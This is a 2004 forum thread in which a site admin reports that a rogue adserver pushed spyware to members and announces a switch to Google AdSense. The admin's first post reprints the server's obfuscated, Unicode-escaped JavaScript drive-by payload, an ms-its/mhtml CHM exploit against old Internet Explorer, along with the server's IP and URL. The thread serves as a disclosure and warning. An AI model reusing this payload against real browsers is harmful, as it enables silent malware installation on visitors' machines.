Ad provider change & Info on Spyware


Recommended Posts

Steven P.

ok first off I want to thank Adster. We had some pretty heated discussion on the method of his postings but I am now convinced he was helping, and he did.. Heres what we found out:

I got the PM from Adster and he is correct that an adserver is loading spyware on members PC's I can't however trace the IP to a single advertiser.

The IP is 69.50.139.61 and the url is 69.50.139.61/hp1/hp1.htm (url disabled, don't access it on an unprotected PC please) it contains java script:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

<script type="text/javascript">document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u000d\u000a')</script>

if you browse to the root folders you get the message: This is an adserver. Please contact advertisers directly

So I think we can safely say this does come from one of our advertisers. I have blocked the IP in cPanel..

a WHOIS returns very little information:

NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)

                                    69.50.128.0 - 69.50.143.255

OMEGABYTE Computer Corporation MACH10-OMEGA1 (NET-69-50-139-0-1)

                                    69.50.139.0 - 69.50.139.127

 

# ARIN WHOIS database, last updated 2004-04-20 20:01

# Enter ? for additional hints on searching ARIN's WHOIS database.

and now for the bad news..

http://www.google.nl/search?num=20&hl=en&i...Inc&btnG=Search

NationalNet Inc is a large Adult hosting company, so this makes me wonder what they are doing to with our webviews and why they are involved with one of our ad companies!

As a result we have disabled ALL 468x60 ads and become a member of Google AdSense (which are now displaying all 468x60 ads on Neowin). We can be sure the ads they deliver will not attempt to load spyware on your PC. The intelliText on the main page, AdSquares and towers remain (also not on the forums anyway) Google AdSense also has the option to deliver feedback if you click the Ads by Google link.

I want to thank everyone who helped us get to the bottom of this the only negative side to this is that we couldn't find out which advertiser controls that IP (all our advertisers deny being involved with Spyware)

Link to post
Share on other sites
Simon-

So are the Google ads per view or per click? and do they pay the same/more/less? I definately hope that it's enough to pay for your costs otherwise if you are losing money, I would do something to help get some more money into Neowin.

Link to post
Share on other sites
aem4162

what, if anything do we do to get the stuff off our computers? i'm gonna run ad-aware and spybot....

Link to post
Share on other sites
Ivand

I like the changes Neobond, i like more the no graphical ads by googl

Link to post
Share on other sites
Chode

Great changes (Y)

I've never seen a problem with Google's ads

Link to post
Share on other sites
kongit

(Y) great.

ps. this thread is insanely wide.

Link to post
Share on other sites
Wiser87
(Y) great.

ps. this thread is insanely wide.

Hahahahaha! I was wondering when someone was going to mention that! :D :laugh:

Link to post
Share on other sites
Steven P.
(Y) great.

ps. this thread is insanely wide.

not for me it isn't (using IE6)

Link to post
Share on other sites
calidude

Not insanely wide for me either...

Link to post
Share on other sites
Simon-

it's screwed up for me in IE6, but worse in the fox.

Link to post
Share on other sites
Oblivion

Nice Move Neobond (Y)

Link to post
Share on other sites
Si

Wow Neobond is romping through the site maintenance at the minute!

Thanks for you hard work! (Y)

Also, this thread is very wide (using firefox 0.8+)

Link to post
Share on other sites
Rell
ps. this thread is insanely wide.

Description of post should say...

"Warning: Some users of alternative browsers (Firefox) may experience a wide load."

:rofl:

Link to post
Share on other sites
tomwarren

Good to hear :)

Bloody advertising companies, anyway to make money - pssh.

Link to post
Share on other sites
Toxikk

woohoo! finally got to the bottom of that whole mess.

thanks! the new ones look great.

Link to post
Share on other sites
Frank

For the people having problems with the thread being wide, try changing your resolution. Mine was fine untill SOMEONE posted a pic. :D

Link to post
Share on other sites
Adster

It's me again! :p

I just wanted to thank Neobond for nipping this thing before the problem became more widespread. He's a great Admin. Thumbs up to you! (Y)

On a side note, one more thing about that trojan that I didn't realize earlier. It replaces wmplayer.exe with an installation file so when you try to open a video or audio file that opens in Windows Media Player, it downloads more spyware instead. To fix that, run wm_setup.exe in the same directory (usually C:\Program Files\Windows Media Player) and it will re-download the original wmplayer.exe file.

Once again, thanks Neobond!

Link to post
Share on other sites
Zetter

the google adds may not be as relevent as they could be...

Longhorn Texas

Compare and buy it on eBay. Thousands of new & used items!

Methinks Keywords should be re-thought

Link to post
Share on other sites
Steven P.
the google adds may not be as relevent as they could be...

Longhorn Texas

Compare and buy it on eBay. Thousands of new & used items!

Methinks Keywords should be re-thought

I thought I asked people not to whine about the ads. How many times do I have to say that we need them, do you think I want them?

Link to post
Share on other sites
vip

wow, this thread is like WHOA wide ....

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.